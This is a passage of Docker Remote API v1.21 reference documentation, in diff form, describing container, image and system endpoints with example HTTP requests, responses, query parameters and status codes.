+-   **409** - conflict name already assigned
+-   **500** – server error
+
+#### Pause a container
+
+`POST /containers/(id or name)/pause`
+
+Pause the container `id`
+
+**Example request**:
+
+    POST /v1.21/containers/e90e34656806/pause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Unpause a container
+
+`POST /containers/(id or name)/unpause`
+
+Unpause the container `id`
+
+**Example request**:
+
+    POST /v1.21/containers/e90e34656806/unpause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Attach to a container
+
+`POST /containers/(id or name)/attach`
+
+Attach to the container `id`
+
+**Example request**:
+
+    POST /v1.21/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 101 UPGRADED
+    Content-Type: application/vnd.docker.raw-stream
+    Connection: Upgrade
+    Upgrade: tcp
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+**Stream details**:
+
+When using the TTY setting is enabled in
+[`POST /containers/create`
+](#create-a-container),
+the stream is the raw data from the process PTY and client's `stdin`.
+When the TTY is disabled, then the stream is multiplexed to separate
+`stdout` and `stderr`.
+
+The format is a **Header** and a **Payload** (frame).
+
+**HEADER**
+
+The header contains the information which the stream writes (`stdout` or
+`stderr`). It also contains the size of the associated frame encoded in the
+last four bytes (`uint32`).
+
+It is encoded on the first eight bytes like this:
+
+    header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}
+
+`STREAM_TYPE` can be:
+
+-   0: `stdin` (is written on `stdout`)
+-   1: `stdout`
+-   2: `stderr`
+
+`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of
+the `uint32` size encoded as big endian.
+
+**PAYLOAD**
+
+The payload is the raw stream.
+
+**IMPLEMENTATION**
+
+The simplest way to implement the Attach protocol is the following:
+
+    1.  Read eight bytes.
+    2.  Choose `stdout` or `stderr` depending on the first byte.
+    3.  Extract the frame size from the last four bytes.
+    4.  Read the extracted size and output it on the correct output.
+    5.  Goto 1.
+
+#### Attach to a container (websocket)
+
+`GET /containers/(id or name)/attach/ws`
+
+Attach to the container `id` via websocket
+
+Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455)
+
+**Example request**
+
+    GET /v1.21/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
+
+**Example response**
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+#### Wait a container
+
+`POST /containers/(id or name)/wait`
+
+Block until container `id` stops, then returns the exit code
+
+**Example request**:
+
+    POST /v1.21/containers/16253994b7c4/wait HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"StatusCode": 0}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Remove a container
+
+`DELETE /containers/(id or name)`
+
+Remove the container `id` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.21/containers/16253994b7c4?v=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **v** – 1/True/true or 0/False/false, Remove the volumes
+        associated to the container. Default `false`.
+-   **force** - 1/True/true or 0/False/false, Kill then remove the container.
+        Default `false`.
+
+**Status codes**:
+
+-   **204** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **409** – conflict
+-   **500** – server error
+
+#### Copy files or folders from a container
+
+`POST /containers/(id or name)/copy`
+
+Copy files or folders of container `id`
+
+**Deprecated** in favor of the `archive` endpoint below.
+
+**Example request**:
+
+    POST /v1.21/containers/4fa6e0f0c678/copy HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "Resource": "test.txt"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Retrieving information about files and folders in a container
+
+`HEAD /containers/(id or name)/archive`
+
+See the description of the `X-Docker-Container-Path-Stat` header in the
+following section.
+
+#### Get an archive of a filesystem resource in a container
+
+`GET /containers/(id or name)/archive`
+
+Get a tar archive of a resource in the filesystem of container `id`.
+
+**Query parameters**:
+
+- **path** - resource in the container's filesystem to archive. Required.
+
+    If not an absolute path, it is relative to the container's root directory.
+    The resource specified by **path** must exist. To assert that the resource
+    is expected to be a directory, **path** should end in `/` or  `/.`
+    (assuming a path separator of `/`). If **path** ends in `/.` then this
+    indicates that only the contents of the **path** directory should be
+    copied. A symlink is always resolved to its target.
+
+    > **Note**: It is not possible to copy certain system files such as resources
+    > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the
+    > container.
+
+**Example request**:
+
+    GET /v1.21/containers/8cce319429b2/archive?path=/root HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+    X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0=
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+On success, a response header `X-Docker-Container-Path-Stat` will be set to a
+base64-encoded JSON object containing some filesystem header information about
+the archived resource. The above example value would decode to the following
+JSON object (whitespace added for readability):
+
+```json
+{
+    "name": "root",
+    "size": 4096,
+    "mode": 2147484096,
+    "mtime": "2014-02-27T20:51:23Z",
+    "linkTarget": ""
+}
+```
+
+A `HEAD` request can also be made to this endpoint if only this information is
+desired.
+
+**Status codes**:
+
+- **200** - success, returns archive of copied resource
+- **400** - client error, bad parameter, details in JSON response body, one of:
+    - must specify path parameter (**path** cannot be empty)
+    - not a directory (**path** was asserted to be a directory but exists as a
+      file)
+- **404** - client error, resource not found, one of:
+    – no such container (container `id` does not exist)
+    - no such file or directory (**path** does not exist)
+- **500** - server error
+
+#### Extract an archive of files or folders to a directory in a container
+
+`PUT /containers/(id or name)/archive`
+
+Upload a tar archive to be extracted to a path in the filesystem of container
+`id`.
+
+**Query parameters**:
+
+- **path** - path to a directory in the container
+    to extract the archive's contents into. Required.
+
+    If not an absolute path, it is relative to the container's root directory.
+    The **path** resource must exist.
+- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error
+    if unpacking the given content would cause an existing directory to be
+    replaced with a non-directory and vice versa.
+
+**Example request**:
+
+    PUT /v1.21/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1
+    Content-Type: application/x-tar
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** – the content was extracted successfully
+- **400** - client error, bad parameter, details in JSON response body, one of:
+    - must specify path parameter (**path** cannot be empty)
+    - not a directory (**path** should be a directory but exists as a file)
+    - unable to overwrite existing directory with non-directory
+      (if **noOverwriteDirNonDir**)
+    - unable to overwrite existing non-directory with directory
+      (if **noOverwriteDirNonDir**)
+- **403** - client error, permission denied, the volume
+    or container rootfs is marked as read-only.
+- **404** - client error, resource not found, one of:
+    – no such container (container `id` does not exist)
+    - no such file or directory (**path** resource does not exist)
+- **500** – server error
+
+### 2.2 Images
+
+#### List Images
+
+`GET /images/json`
+
+**Example request**:
+
+    GET /v1.21/images/json?all=0 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+         "RepoTags": [
+           "ubuntu:12.04",
+           "ubuntu:precise",
+           "ubuntu:latest"
+         ],
+         "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c",
+         "Created": 1365714795,
+         "Size": 131506275,
+         "VirtualSize": 131506275,
+         "Labels": {}
+      },
+      {
+         "RepoTags": [
+           "ubuntu:12.10",
+           "ubuntu:quantal"
+         ],
+         "ParentId": "27cf784147099545",
+         "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc",
+         "Created": 1364102658,
+         "Size": 24653,
+         "VirtualSize": 180116135,
+         "Labels": {
+            "com.example.version": "v1"
+         }
+      }
+    ]
+
+**Example request, with digest information**:
+
+    GET /v1.21/images/json?digests=1 HTTP/1.1
+
+**Example response, with digest information**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+        "Created": 1420064636,
+        "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125",
+        "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2",
+        "RepoDigests": [
+          "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"
+        ],
+        "RepoTags": [
+          "localhost:5000/test/busybox:latest",
+          "playdate:latest"
+        ],
+        "Size": 0,
+        "VirtualSize": 2429728,
+        "Labels": {}
+      }
+    ]
+
+The response shows a single image `Id` associated with two repositories
+(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use
+either of the `RepoTags` values `localhost:5000/test/busybox:latest` or
+`playdate:latest` to reference the image.
+
+You can also use `RepoDigests` values to reference an image. In this response,
+the array has only one reference and that is to the
+`localhost:5000/test/busybox` repository; the `playdate` repository has no
+digest. You can reference this digest using the value:
+`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...`
+
+See the `docker run` and `docker build` commands for examples of digest and tag
+references on the command line.
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, default false
+-   **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters:
+  -   `dangling=true`
+  -   `label=key` or `label="key=value"` of an image label
+-   **filter** - only return images with the specified name
+
+#### Build image from a Dockerfile
+
+`POST /build`
+
+Build an image from a Dockerfile
+
+**Example request**:
+
+    POST /v1.21/build HTTP/1.1
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"stream": "Step 1/5..."}
+    {"stream": "..."}
+    {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}}
+
+The input stream must be a `tar` archive compressed with one of the
+following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`.
+
+The archive must include a build instructions file, typically called
+`Dockerfile` at the archive's root. The `dockerfile` parameter may be
+used to specify a different build instructions file. To do this, its value must be
+the path to the alternate build instructions file to use.
+
+The archive may include any number of other files,
+which are accessible in the build context (See the [*ADD build
+command*](../reference/builder.md#add)).
+
+The Docker daemon performs a preliminary validation of the `Dockerfile` before
+starting the build, and returns an error if the syntax is incorrect. After that,
+each instruction is run one-by-one until the ID of the new image is output.
+
+The build is canceled if the client drops the connection by quitting
+or being killed.
+
+**Query parameters**:
+
+-   **dockerfile** - Path within the build context to the `Dockerfile`. This is
+        ignored if `remote` is specified and points to an external `Dockerfile`.
+-   **t** – A name and optional tag to apply to the image in the `name:tag` format.
+        If you omit the `tag` the default `latest` value is assumed.
+        You can provide one or more `t` parameters.
+-   **remote** – A Git repository URI or HTTP/HTTPS context URI. If the
+        URI points to a single text file, the file's contents are placed into
+        a file called `Dockerfile` and the image is built from that file. If
+        the URI points to a tarball, the file is downloaded by the daemon and
+        the contents therein used as the context for the build. If the URI
+        points to a tarball and the `dockerfile` parameter is also specified,
+        there must be a file with the corresponding path inside the tarball.
+-   **q** – Suppress verbose build output.
+-   **nocache** – Do not use the cache when building the image.
+-   **pull** - Attempt to pull the image even if an older image exists locally.
+-   **rm** - Remove intermediate containers after a successful build (default behavior).
+-   **forcerm** - Always remove intermediate containers (includes `rm`).
+-   **memory** - Set memory limit for build.
+-   **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap.
+-   **cpushares** - CPU shares (relative weight).
+-   **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`).
+-   **cpuperiod** - The length of a CPU period in microseconds.
+-   **cpuquota** - Microseconds of CPU time that the container can get in a CPU period.
+-   **buildargs** – JSON map of string pairs for build-time variables. Users pass
+        these values at build-time. Docker uses the `buildargs` as the environment
+        context for command(s) run via the Dockerfile's `RUN` instruction or for
+        variable expansion in other Dockerfile instructions. This is not meant for
+        passing secret values. [Read more about the buildargs instruction](../reference/builder.md#arg)
+
+**Request Headers**:
+
+-   **Content-type** – Set to `"application/tar"`.
+-   **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON
+        object with the following structure:
+
+            {
+                "docker.example.com": {
+                    "username": "janedoe",
+                    "password": "hunter2"
+                },
+                "https://index.docker.io/v1/": {
+                    "username": "mobydock",
+                    "password": "conta1n3rize14"
+                }
+            }
+
+    This object maps the hostname of a registry to an object containing the
+    "username" and "password" for that registry. Multiple registries may
+    be specified as the build may be based on an image requiring
+    authentication to pull from any arbitrary registry. Only the registry
+    domain name (and port if not the default "443") are required. However
+    (for legacy reasons) the "official" Docker, Inc. hosted registry must
+    be specified with both a "https://" prefix and a "/v1/" suffix even
+    though Docker will prefer to use the v2 registry API.
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Create an image
+
+`POST /images/create`
+
+Create an image either by pulling it from the registry or by importing it
+
+**Example request**:
+
+    POST /v1.21/images/create?fromImage=busybox&tag=latest HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pulling..."}
+    {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}}
+    {"error": "Invalid..."}
+    ...
+
+When using this endpoint to pull an image from the registry, the
+`X-Registry-Auth` header can be used to include
+a base64-encoded AuthConfig object.
+
+**Query parameters**:
+
+-   **fromImage** – Name of the image to pull. The name may include a tag or
+        digest. This parameter may only be used when pulling an image.
+-   **fromSrc** – Source to import.  The value may be a URL from which the image
+        can be retrieved or `-` to read the image from the request body.
+        This parameter may only be used when importing an image.
+-   **repo** – Repository name given to an image when it is imported.
+        The repo may include a tag. This parameter may only be used when importing
+        an image.
+-   **tag** – Tag or digest. If empty when pulling an image, this causes all tags
+        for the given image to be pulled.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** - repository does not exist or no read access
+-   **500** – server error
+
+
+
+#### Inspect an image
+
+`GET /images/(name)/json`
+
+Return low-level information on the image `name`
+
+**Example request**:
+
+    GET /v1.21/images/example/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Id" : "85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c",
+       "Container" : "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a",
+       "Comment" : "",
+       "Os" : "linux",
+       "Architecture" : "amd64",
+       "Parent" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c",
+       "ContainerConfig" : {
+          "Tty" : false,
+          "Hostname" : "e611e15f9c9d",
+          "Volumes" : null,
+          "Domainname" : "",
+          "AttachStdout" : false,
+          "PublishService" : "",
+          "AttachStdin" : false,
+          "OpenStdin" : false,
+          "StdinOnce" : false,
+          "NetworkDisabled" : false,
+          "OnBuild" : [],
+          "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c",
+          "User" : "",
+          "WorkingDir" : "",
+          "Entrypoint" : null,
+          "MacAddress" : "",
+          "AttachStderr" : false,
+          "Labels" : {
+             "com.example.license" : "GPL",
+             "com.example.version" : "1.0",
+             "com.example.vendor" : "Acme"
+          },
+          "Env" : [
+             "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+          ],
+          "ExposedPorts" : null,
+          "Cmd" : [
+             "/bin/sh",
+             "-c",
+             "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0"
+          ]
+       },
+       "DockerVersion" : "1.9.0-dev",
+       "VirtualSize" : 188359297,
+       "Size" : 0,
+       "Author" : "",
+       "Created" : "2015-09-10T08:30:53.26995814Z",
+       "GraphDriver" : {
+          "Name" : "aufs",
+          "Data" : null
+       },
+       "RepoDigests" : [
+          "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"
+       ],
+       "RepoTags" : [
+          "example:1.0",
+          "example:latest",
+          "example:stable"
+       ],
+       "Config" : {
+          "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c",
+          "NetworkDisabled" : false,
+          "OnBuild" : [],
+          "StdinOnce" : false,
+          "PublishService" : "",
+          "AttachStdin" : false,
+          "OpenStdin" : false,
+          "Domainname" : "",
+          "AttachStdout" : false,
+          "Tty" : false,
+          "Hostname" : "e611e15f9c9d",
+          "Volumes" : null,
+          "Cmd" : [
+             "/bin/bash"
+          ],
+          "ExposedPorts" : null,
+          "Env" : [
+             "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+          ],
+          "Labels" : {
+             "com.example.vendor" : "Acme",
+             "com.example.version" : "1.0",
+             "com.example.license" : "GPL"
+          },
+          "Entrypoint" : null,
+          "MacAddress" : "",
+          "AttachStderr" : false,
+          "WorkingDir" : "",
+          "User" : ""
+       }
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Get the history of an image
+
+`GET /images/(name)/history`
+
+Return the history of the image `name`
+
+**Example request**:
+
+    GET /v1.21/images/ubuntu/history HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+        {
+            "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710",
+            "Created": 1398108230,
+            "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /",
+            "Tags": [
+                "ubuntu:lucid",
+                "ubuntu:10.04"
+            ],
+            "Size": 182964289,
+            "Comment": ""
+        },
+        {
+            "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8",
+            "Created": 1398108222,
+            "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi <admwiggin@gmail.com> - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/",
+            "Tags": null,
+            "Size": 0,
+            "Comment": ""
+        },
+        {
+            "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158",
+            "Created": 1371157430,
+            "CreatedBy": "",
+            "Tags": [
+                "scratch12:latest",
+                "scratch:latest"
+            ],
+            "Size": 0,
+            "Comment": "Imported from -"
+        }
+    ]
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Push an image on the registry
+
+`POST /images/(name)/push`
+
+Push the image `name` on the registry
+
+**Example request**:
+
+    POST /v1.21/images/test/push HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pushing..."}
+    {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}}
+    {"error": "Invalid..."}
+    ...
+
+If you wish to push an image on to a private registry, that image must already have a tag
+into a repository which references that registry `hostname` and `port`.  This repository name should
+then be used in the URL. This duplicates the command line's flow.
+
+**Example request**:
+
+    POST /v1.21/images/registry.acme.com:5000/test/push HTTP/1.1
+
+
+**Query parameters**:
+
+-   **tag** – The tag to associate with the image on the registry. This is optional.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Tag an image into a repository
+
+`POST /images/(name)/tag`
+
+Tag the image `name` into a repository
+
+**Example request**:
+
+    POST /v1.21/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+
+**Query parameters**:
+
+-   **repo** – The repository to tag in
+-   **force** – 1/True/true or 0/False/false, default false
+-   **tag** - The new tag name
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Remove an image
+
+`DELETE /images/(name)`
+
+Remove the image `name` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.21/images/test HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-type: application/json
+
+    [
+     {"Untagged": "3e2f21a89f"},
+     {"Deleted": "3e2f21a89f"},
+     {"Deleted": "53b4f83ac9"}
+    ]
+
+**Query parameters**:
+
+-   **force** – 1/True/true or 0/False/false, default false
+-   **noprune** – 1/True/true or 0/False/false, default false
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Search images
+
+`GET /images/search`
+
+Search for an image on [Docker Hub](https://hub.docker.com).
+
+> **Note**:
+> The response keys have changed from API v1.6 to reflect the JSON
+> sent by the registry server to the docker daemon's request.
+
+**Example request**:
+
+    GET /v1.21/images/search?term=sshd HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "wma55/u1210sshd",
+                "star_count": 0
+            },
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "jdswinbank/sshd",
+                "star_count": 0
+            },
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "vgauthier/sshd",
+                "star_count": 0
+            }
+    ...
+    ]
+
+**Query parameters**:
+
+-   **term** – term to search
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+### 2.3 Misc
+
+#### Check auth configuration
+
+`POST /auth`
+
+Get the default username and email
+
+**Example request**:
+
+    POST /v1.21/auth HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "username": "hannibal",
+         "password": "xxxx",
+         "email": "hannibal@a-team.com",
+         "serveraddress": "https://index.docker.io/v1/"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+-   **200** – no error
+-   **204** – no error
+-   **500** – server error
+
+#### Display system-wide information
+
+`GET /info`
+
+Display system-wide information
+
+**Example request**:
+
+    GET /v1.21/info HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+        "ClusterStore": "etcd://localhost:2379",
+        "Containers": 11,
+        "CpuCfsPeriod": true,
+        "CpuCfsQuota": true,
+        "Debug": false,
+        "DockerRootDir": "/var/lib/docker",
+        "Driver": "btrfs",
+        "DriverStatus": [[""]],
+        "ExecutionDriver": "native-0.1",
+        "ExperimentalBuild": false,
+        "HttpProxy": "http://test:test@localhost:8080",
+        "HttpsProxy": "https://test:test@localhost:8080",
+        "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS",
+        "IPv4Forwarding": true,
+        "Images": 16,
+        "IndexServerAddress": "https://index.docker.io/v1/",
+        "InitPath": "/usr/bin/docker",
+        "InitSha1": "",
+        "KernelVersion": "3.12.0-1-amd64",
+        "Labels": [
+            "storage=ssd"
+        ],
+        "MemTotal": 2099236864,
+        "MemoryLimit": true,
+        "NCPU": 1,
+        "NEventsListener": 0,
+        "NFd": 11,
+        "NGoroutines": 21,
+        "Name": "prod-server-42",
+        "NoProxy": "9.81.1.160",
+        "OomKillDisable": true,
+        "OperatingSystem": "Boot2Docker",
+        "RegistryConfig": {
+            "IndexConfigs": {
+                "docker.io": {
+                    "Mirrors": null,
+                    "Name": "docker.io",
+                    "Official": true,
+                    "Secure": true
+                }
+            },
+            "InsecureRegistryCIDRs": [
+                "127.0.0.0/8"
+            ]
+        },
+        "ServerVersion": "1.9.0",
+        "SwapLimit": false,
+        "SystemTime": "2015-03-10T11:11:23.730591467-07:00"
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Show the docker version information
+
+`GET /version`
+
+Show the docker version information
+
+**Example request**:
+
+    GET /v1.21/version HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+         "Version": "1.5.0",
+         "Os": "linux",
+         "KernelVersion": "3.18.5-tinycore64",
+         "GoVersion": "go1.4.1",
+         "GitCommit": "a8a31ef",
+         "Arch": "amd64",
+         "ApiVersion": "1.20",
+         "Experimental": false
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Ping the docker server
+
+`GET /_ping`
+
+Ping the docker server
+
+**Example request**:
+
+    GET /v1.21/_ping HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: text/plain
+
+    OK
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Create a new image from a container's changes
+
+`POST /commit`
+
+Create a new image from a container's changes
+
+**Example request**:
+
+    POST /v1.21/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "Hostname": "",
+         "Domainname": "",
+         "User": "",
+         "AttachStdin": false,
+         "AttachStdout": true,
+         "AttachStderr": true,
+         "Tty": false,
+         "OpenStdin": false,
+         "StdinOnce": false,
+         "Env": null,
+         "Cmd": [
+                 "date"
+         ],
+         "Mounts": [
+           {
+             "Source": "/data",
+             "Destination": "/data",
+             "Mode": "ro,Z",
+             "RW": false
+           }
+         ],
+         "Labels": {
+                 "key1": "value1",
+                 "key2": "value2"
+          },
+         "WorkingDir": "",
+         "NetworkDisabled": false,
+         "ExposedPorts": {
+                 "22/tcp": {}
+         }
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {"Id": "596069db4bf5"}
+
+**JSON parameters**:
+
+-  **config** - the container's configuration
+
+**Query parameters**:
+
+-   **container** – source container
+-   **repo** – repository
+-   **tag** – tag
+-   **comment** – commit message
+-   **author** – author (e.g., "John Hannibal Smith
+    <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>")
+-   **pause** – 1/True/true or 0/False/false, whether to pause the container before committing
+-   **changes** – Dockerfile instructions to apply while committing
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Monitor Docker's events
+
+`GET /events`
+
+Get container events from docker, in real time via streaming.
+
+Docker containers report the following events:
+
+    attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause
+
+Docker images report the following events:
+
+    delete, import, pull, push, tag, untag
+
+**Example request**:
+
+    GET /v1.21/events?since=1374067924
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status":"pull","id":"busybox:latest","time":1442421700,"timeNano":1442421700598988358}
+    {"status":"create","id":"5745704abe9caa5","from":"busybox","time":1442421716,"timeNano":1442421716853979870}
+    {"status":"attach","id":"5745704abe9caa5","from":"busybox","time":1442421716,"timeNano":1442421716894759198}
+    {"status":"start","id":"5745704abe9caa5","from":"busybox","time":1442421716,"timeNano":1442421716983607193}
+
+**Query parameters**:
+
+-   **since** – Timestamp. Show all events created since timestamp and then stream
+-   **until** – Timestamp. Show events created until given timestamp and stop streaming
+-   **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters:
+  -   `container=<string>`; -- container to filter
+  -   `event=<string>`; -- event to filter
+  -   `image=<string>`; -- image to filter
+  -   `label=<string>`; -- image and container label to filter
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images in a repository
+
+`GET /images/(name)/get`
+
+Get a tarball containing all images and metadata for the repository specified
+by `name`.
+
+If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image
+(and its parents) are returned. If `name` is an image ID, similarly only that
